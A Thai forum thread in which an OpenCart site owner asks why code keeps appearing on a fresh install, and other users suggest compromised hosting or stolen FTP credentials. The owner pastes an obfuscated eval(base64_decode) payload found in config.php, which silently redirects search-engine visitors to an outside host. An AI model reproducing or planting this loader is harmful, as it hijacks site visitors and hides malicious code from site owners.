opencart เพิ่งติดตั้งใหม่ ทิ้งไว้ 1-2 วัน กลับมาเต็มไปด้วยโค๊ดทั้งหน้าเลยครับ

[takaeshi]

พอดีเพิ่งโหลดมาลงครับ ทั้งที่แจกกันฟรี  และแบบที่ไม่แถมโปรแกรมอะไรมาเลย  พอติดตั้งเสร็จก็เข้าได้ปกติ  แต่พอทิ้งไว้  2-3 วัน กลับมา หน้าเว็บก็เข้าได้  แต่ด้านบนเกือบครึ่งหน้าโค๊ดเด็มเลยครับ  เป็นมาหลายครั้งแล้ว ผมก็ลบและก็ติดตั้งใหม่  ลงตัวใหม่ก็เป็นตลอด   ไม่ทราบว่าเกิดจากสาเหตุใดครับ ทั้งๆ ที่ ปรับไฟล์ config.php  กลับมาเป็น 644 แล้วนะครับ (ไม่รู้จะเกี่ยวป่าว)   อยากทราบว่าแก้ตรงไหนครับ  ขอบคุณครับ

http://tulanon.com/

[adidog]

เครื่องมีไวรัสหรือเปล่า หรือไม่โฮสต์ก็โดนแฮกครับ

โค้ด เลือก ขยาย

Notice: Undefined index: HTTP_REFERER in /home/parivart/domains/tulanon.com/public_html/catalog/language/thai/thai.php(1) : eval()'d code on line 5Notice

[takaeshi]

ต้องแจ้งทางโฮสต์อย่างเดียวเลยใช่ป่าวครับ  ผมเคยติดตั้งจากอีกเครื่องก็เป็นเหมือนกันครับ  (ติดตั้งไว้ ตำแหน่งเดียวกันนี้เลยครับ)

[NaiTan]

ต้องแจ้งทางโฮสต์อย่างเดียวเลยใช่ป่าวครับ  ผมเคยติดตั้งจากอีกเครื่องก็เป็นเหมือนกันครับ

ผมว่า     opencart   มีช่องโหว่ครับ 

[papiya]

......

[adidog]

ต้องแจ้งทางโฮสต์อย่างเดียวเลยใช่ป่าวครับ  ผมเคยติดตั้งจากอีกเครื่องก็เป็นเหมือนกันครับ

ผมว่า     opencart   มีช่องโหว่ครับ  

https://www.google.com/search?hl=en&filter=0&lr=&ie=UTF-8&q=site:tulanon.com

ดูแค่แคช google ก็รู้แล้วครับ ปัญหาไม่ได้มาจากสคริปต์

เพิ่มเติม ยิ่งพวกไฟล์ .php ดูด้วยแล้ว chmod ต้อง 644 ในแคชของ gg ยังบอกเลยว่ามี eval() ในไฟล์ภาษา ก็พอจะรู้ได้ว่ามันเจาะมาทางไหน ถ้ามันไม่ได้สิทธิ์เขียนไฟล์ได้

[NaiTan]

ลองเปลี่ยนรหัสผ่าน FTP ครับ เป็นไปได้ที่จะถูกโจมตีผ่าน FTP   ล็อคอินเข้าไปแทรกโค้ดแปลกปลอมในไฟล์ต่างๆของระบบดังที่เห็นแสดงเออเล่อ

แนะนำให้ใช้เครื่องที่ปลอดไวรัสในการ FTP ไปที่เซิร์ฟเวอร์ ไม่อย่างนั้นคุณจะโดนขโมยรหัสผ่านไปอีก

[max30012540]

ดูๆแล้วก็ งงๆ ครับ ตัวแปร HTTP_REFERER มันจะ Error ไปได้ไง 
ลองดูใน phpinfo ดูละกันครับ ว่าปิด eval ไว้หรือเปล่า

[max30012540]

กับอีกวิธี คือหักดิบไปเลย
.htaccess

โค้ด เลือก ขยาย


php_flag display_startup_errors on
php_flag display_errors on
php_flag html_errors on
php_flag log_errors on


[adidog]

ดูๆแล้วก็ งงๆ ครับ ตัวแปร HTTP_REFERER มันจะ Error ไปได้ไง 
ลองดูใน phpinfo ดูละกันครับ ว่าปิด eval ไว้หรือเปล่า

ผมว่าน่าจะโดนฝังสคริปต์ที่เป็น eval() มากกว่าครับ 

[takaeshi]

ด้วยความรู้ในเรื่องนี้น้อย  ผมจะลองปล้ำกะมันในวันเสาร์อาทิตย์ดีกว่า  ถ้าไม่ได้ต้องลงใหม่  ดูซิว่าจะหายหรือไม่

ปล. 1.ไฟล์ php.info อยู่ตรงไหนเหรอครับ หาไม่เจอจริงๆ
      2. ที่ท่าน max30012540 แนะนำให้ใช้โค๊ดในไฟล์ .htaccess   ไม่สำเร็จครับ
     
ขอบพระคุณทุกๆ ท่านครับ

[Freedomlover]

ดูๆแล้วก็ งงๆ ครับ ตัวแปร HTTP_REFERER มันจะ Error ไปได้ไง 
ลองดูใน phpinfo ดูละกันครับ ว่าปิด eval ไว้หรือเปล่า

ผมว่าน่าจะโดนฝังสคริปต์ที่เป็น eval() มากกว่าครับ 

น่าจะเป็นตามนี้ครับ    ตอนที่เปลี่ยนไปใช้เครื่องอื่น ไม่แน่ใจว่าได้เปลี่ยนรหัสผ่าน ftp หรือเปล่า

[popep]

ได้โหลดจาก http://www.opencart.com/ หรือเปล่าครับ

[takaeshi]

ตอนนี้ลงใหม่แล้วครับ  เปลี่ยน พาสเวิร์ด  FTP ใหม่ ด้วย ลองปล่อยซักระยะ ถ้าไม่มีอะไรเปลี่ยนแปลง ค่อยหาวิธีทำอย่างอื่นครับ

หากมีปัญหา จะรบกวนทุกท่านอีกสักครั้งครับ  ขอบคุณครับ

[GoogleBot]

ลงตามวิธีที่ถูกต้องหรือเปล่าพวก 777 อะครับ

เช็คดี ๆ มีโฟลเดอร์ย่อยด้วย

ถ้าคิดว่าครบทุกอย่างแล้วเป็น แนะนำให้เปลี่ยนพาส ftp ครับ อาจจะโดนสอยตูดแล้ว 555+

[takaeshi]

หลังจากเปลี่ยนรหัส FTP  ใช้มาได้ 4-5 วัน กลับมาเป็นเหมือนเดิมอีกแล้วครับ   ใช้วิธีใส่โค๊ดตามท่าน max30012540  ก็ไม่หาย    แต่มันจะเป็นเฉพาะหน้าแรกนะครับ  เมื่อเราคลิกหน้าต่อไป  หรือหน้าอื่น โค๊ดที่ว่าก็จะไม่มีแล้วครับ
พอไปดูแถวแรกของไฟล์ config.php เจอแบบนี้ครับ
<?php       eval(base64_decode("CmVycm9yX3JlcG9ydGluZygwKTsKJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsKaWYgKCEkcWF6cGxtKXsKJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOwokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsKaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tL2wiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsKaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIGFuZCAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSBhbmQgIXN0cmlzdHIoJHJlZmVyZXIsIkVlWXAzRDciKSl7CmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly91ZW5ka2drdy5kZG5zLm1lLnVrLyIpOwpleGl0KCk7Cn0KfQp9Cn0KfQ=="));
// HTTP

ไม่ทราบว่าเกี่ยวกันหรือไม่   ส่วนไฟล์  php.ini  เป็นอย่างนี้ครับ  (ไฟล์ php.info หาไม่เจอครับ
magic_quotes_gpc = Off;
register_globals = Off;
default_charset   = UTF-8;
memory_limit = 64M;
max_execution_time = 36000;
upload_max_filesize = 999M;
safe_mode = Off;
mysql.connect_timeout = 20;
session.use_cookies = On;
session.use_trans_sid = Off;
session.gc_maxlifetime = 172800;
allow_url_fopen = on;
;display_errors = 1;
;error_reporting = E_ALL;

ไม่ทราบว่ามีอะไรผิดปกติหรือเปล่า  พอจะแก้ไขตรงไหนได้บ้างครับ  ขอบคุณครับ  เพราะตอนนี้จะเริ่มลงข้อมูลให้โรงเรียนแล้วครับ  

[bangkokbank]

ผมเคยเจอตัวนี้เมื่อหลายปีที่แล้ว มันจะแทรกในไฟล์ที่ชื่อ index นามสกุลอะไรก็แล้วแต่ไปไล่ดูได้ในไฟล์ชื่อพวกนี้เท่านั้น

ต้นตอของปัญหาคือโปรแกรม FTP ครับไม่ใช่โดนใครแฮกเว็บหรืออะไรแบบเจาะจงโดยแฮกเกอร์เซียนอะไรเลยครับ
เปลี่ยน Password FTP ก็ไม่หายเพราะตัวแอพ FTP เองนั่นแหละครับมีช่องโหว่หรือต้นเหตุ
ส่วนใหญ่ที่โดนๆกันตัวนี้เพราะใช้ FTP FileZilla
วิธีแก้ก็ให้ไล่เคลียร์พวกไฟล์ที่โดนให้หมดก่อน อย่าใช้โปรแกรม FTP เดิมอีก
แล้วเวลาจะอัพอะไรใหม่ก็ให้ใช้โปรแกรม FTP ใหม่ที่ปลอดภัยมากกว่าที่แจกฟรีหรือที่เก็บ password ไว้ในรูป txt file แบบ FileZilla ครับ(ไม่รู้ปัจจุบันแก้ไขเรื่องนี้หรือยังนะ)